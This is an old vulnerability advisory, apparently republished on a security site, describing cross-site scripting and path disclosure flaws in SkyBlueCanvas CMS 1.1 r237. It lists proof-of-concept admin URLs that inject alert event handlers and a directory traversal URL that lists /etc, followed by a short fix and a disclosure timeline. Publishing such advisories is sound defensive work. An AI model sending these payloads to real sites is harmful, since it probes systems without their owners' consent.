SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

2009.06.22
Credit: InterNOT
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities Version Affected: 1.1 r237 (newest version: 1.1 r246) Info: SkyBlueCanvas Lightweight CMS is an open source, free content management system written in php and built specifically for small web sites. The entire site you are viewing is a demonstration of the SkyBlueCanvas lightweight CMS. SkyBlueCanvas is custom-built for those instances when more robust systems like Joomla, WordPress and Drupal are too much horsepower. Credits: InterN0T External Links: http://www.skybluecanvas.com -:: The Advisory ::- Vulnerable Function / ID Calls: mgroup, mgr, objtype, id & dir. Cross Site Scripting: (requires administrator access - will not survive a login screen) http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2 http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager Impossible XSS: (XML errors or hidden tags preventing use of event handlers.) http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&o bjtype=">XSS http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page &sub=editpage&id=" onfocus=alert(0) > http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS Path Content Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../.. /../../../../../etc/ -- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/ --=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw. Path Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype= media&dir=all&sub=move&id=' http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype= media&dir=all&sub=rename&id=' -:: Solution ::- Filter event handlers out from function calls. Conclusion: Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable. Reference: http://forum.intern0t.net/intern0t-advisories/1120-intern0t-skybluecanva s-1-1-r237-multiple-vulnerabilities.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top